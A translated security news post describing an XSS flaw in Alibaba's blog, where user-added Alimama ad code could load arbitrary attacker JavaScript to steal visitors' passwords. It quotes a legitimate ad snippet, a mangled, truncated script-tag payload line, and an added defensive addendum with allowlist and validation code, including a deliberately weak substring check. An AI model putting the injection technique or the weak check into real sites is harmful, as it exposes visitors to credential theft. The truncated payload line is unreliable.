Alibaba network blog can now be exploited to insert malicious code

According to a report from the domestic security organization Security Cordon, the Alibaba network blog has a vulnerability: because its input filtering is not strict, malicious hackers may be able to load arbitrary JS code through an ad link, stealing passwords or visitors' related assets in an XSS attack. Details are as follows:

Article author: attacker

Source: Security Cordon

Article note: the trojan (the JS payload) has been sent by e-mail

The Alibaba network blog allows users to add Alimama advertising, but it does not restrict the script address to Alimama's own domain, so a JS trojan (any attacker-hosted script) can be loaded in its place. The simplest method is as follows:

<script type="text/javascript">
alimama_pid="mm_10031051_1309365_2877941";
alimama_titlecolor="0000FF";
alimama_descolor="000000";
alimama_bgcolor="FFFFFF";
alimama_bordercolor="E6E6E6";
alimama_linkcolor="008000";
alimama_bottomcolor="FFFFFF";
alimama_anglesize="0";
alimama_bgpic="0";
alimama_icon="0";
alimama_sizecode="22";
alimama_width=120;
alimama_height=240;
alimama_type=2;
</script>
<script src="http://s.a.alimama.cn/js.js" type="text/javascript"></script>
<script src="http //>:
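The root cause above is an allowlist that was never enforced on the script address, and the inline <script> block in the snippet is itself arbitrary code. The following is an added example of how a blog should handle such an ad snippet; it is not code from the original post or from Alibaba. The allowed host "s.a.alimama.cn" and the parameter names are taken from the snippet in the post; the function names, the parameter schema, the "weak" substring check and the hostile test URLs are assumptions for illustration.

```javascript
// Added example, not from the original post or from Alibaba.
// Allowed script host taken from the snippet in the post; everything else
// (function names, parameter schema, hostile inputs) is assumed.

const ALLOWED_SCRIPT_HOSTS = new Set(["s.a.alimama.cn"]);

// A substring check of the kind that lets this bug through: any src that
// merely contains the brand's domain is accepted. Illustrative only; the
// post does not say what check, if any, the blog actually performed.
function weakIsAllowedSrc(src) {
  return src.indexOf("alimama.cn") !== -1;
}

// Hardened check: parse the URL, require http(s), no embedded credentials,
// and an exact (case-folded) hostname match against the allowlist.
function isAllowedScriptSrc(src) {
  let url;
  try {
    url = new URL(src); // throws on relative paths, "//host/x" and garbage
  } catch (e) {
    return false;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  if (url.username !== "" || url.password !== "") return false; // host@evil
  return ALLOWED_SCRIPT_HOSTS.has(url.hostname.toLowerCase());
}

// Even an exact src check is not enough: the first <script> block of the
// snippet is inline code and runs whatever the user typed. The robust fix is
// to never accept HTML from the user at all: store only the ad parameters,
// validate each against a strict pattern, and render the tags server-side
// with a fixed src (the URL below is the one from the post's snippet).
const PID_RE = /^mm_\d+_\d+_\d+$/;
const HEX_RE = /^[0-9A-Fa-f]{6}$/;
const COLOR_KEYS = ["titlecolor", "descolor", "bgcolor", "bordercolor",
                    "linkcolor", "bottomcolor"];
const INT_KEYS = ["width", "height", "type"];

function renderAlimamaSnippet(params) {
  if (typeof params.pid !== "string" || !PID_RE.test(params.pid)) {
    throw new Error("invalid alimama pid");
  }
  const lines = ['<script type="text/javascript">',
                 'alimama_pid="' + params.pid + '";'];
  for (const key of COLOR_KEYS) {
    const v = params[key] === undefined ? "000000" : params[key];
    if (typeof v !== "string" || !HEX_RE.test(v)) {
      throw new Error("invalid color for " + key);
    }
    lines.push("alimama_" + key + '="' + v + '";');
  }
  for (const key of INT_KEYS) {
    const v = params[key];
    if (!Number.isInteger(v) || v < 0 || v > 10000) {
      throw new Error("invalid integer for " + key);
    }
    lines.push("alimama_" + key + "=" + v + ";");
  }
  lines.push("</script>");
  lines.push('<script src="http://s.a.alimama.cn/js.js" type="text/javascript"></script>');
  return lines.join("\n");
}
```

Only a subset of the snippet's parameters (pid, six colours, width, height, type) is modelled; the remaining numeric flags would be validated the same way. The point of renderAlimamaSnippet is that user input never reaches the page as markup, only as values that have already matched a pattern too narrow to carry a quote, a tag or a URL.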